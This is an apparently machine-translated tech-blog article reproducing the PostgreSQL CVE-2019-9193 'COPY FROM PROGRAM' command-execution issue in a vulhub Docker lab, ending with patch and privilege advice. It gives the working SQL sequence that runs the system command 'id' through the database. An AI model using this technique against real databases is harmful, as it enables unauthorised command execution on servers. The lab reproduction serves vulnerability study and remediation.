Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to deal with the PostgreSQL high-authority command execution vulnerability CVE-2019-9193. The editor thinks it is very practical, so I share it with you for reference. I hope you can get something after reading this article.

Introduction to 0x00

PostgreSQL (pronounced Post-Gres-Q-L) is a very powerful and open source client / server relational database management system (RDBMS). A license agreement like MIT allows developers to do anything, including commercial use in open source or closed source products, whose source code is provided free of charge.

PostgreSQL features:

Z. supports WINDOWS, Linux, Solaris, macOS, BSD.

Z. supports text, image, video, sound, etc.

Z. supports ACID, relational integrity, database transactions, and Unicode multi-language.

Z. supports temporary tables and materialized views

Z. supports many functions of SQL, such as complex SQL queries, subqueries, foreign keys, triggers, views, multi-process concurrency control (MVCC), asynchronous replication.

Overview of 0x01 vulnerabilities

PostgreSQL is a powerful object relational database management system (ORDBMS). Due to the addition of a "COPY TO/FROM PROGRAM" function. This function allows the super user of the database and any user in the pg_read_server_files group to execute operating system commands

0x02 affects version

9.3-11.2

0x03 environment building

1. The environment of this vulnerability is built with docker in vulhub. Download address of vulhub:

Https://github.com/vulhub/vulhub

two。 After the download is completed, use xftp to input the virtual machine with docker and ring docker-compose installed to extract and start the environment.

Cd vulhub-master/postgres/CVE-2019-9193

Docker-compose up-d

3. Use docker ps to see if the startup is successful

4. After starting successfully, use navicat to connect to the database. The initial account password of the database is postgres/.

Postgres

Recurrence of 0x04 vulnerabilities

Note: this vulnerability lies somewhere between privilege escalation and arbitrary code execution, and requires some prerequisite permissions, either through a normal login to PostgreSQL or through SQL injection to interact with PostgreSQL. It should be noted that in both cases, the user is required to be a super user or a "pg_read_server_files" group user.

1. It is optional to delete tables that you want to use to save command output but may exist.

DROP TABLE IF EXISTS cmd_exec

two。 Create a table to hold the command output

CREATE TABLE cmd_exec (cmd_output text)

3. Execute system commands through "COPY FROM PROGRAM"

COPY cmd_exec FROM PROGRAM 'id'

4. Display the results

SELECT * FROM cmd_exec

5. Execute other commands

6. View account information

0x05 repair recommendation

1. Upgrade to the latest version is recommended

two。 Control database permissions to prevent ordinary users from executing commands

On "PostgreSQL high authority command execution vulnerability CVE-2019-9193 how to deal with" this article is shared here, I hope the above content can be of some help to you, so that you can learn more knowledge, if you think the article is good, please share it out for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.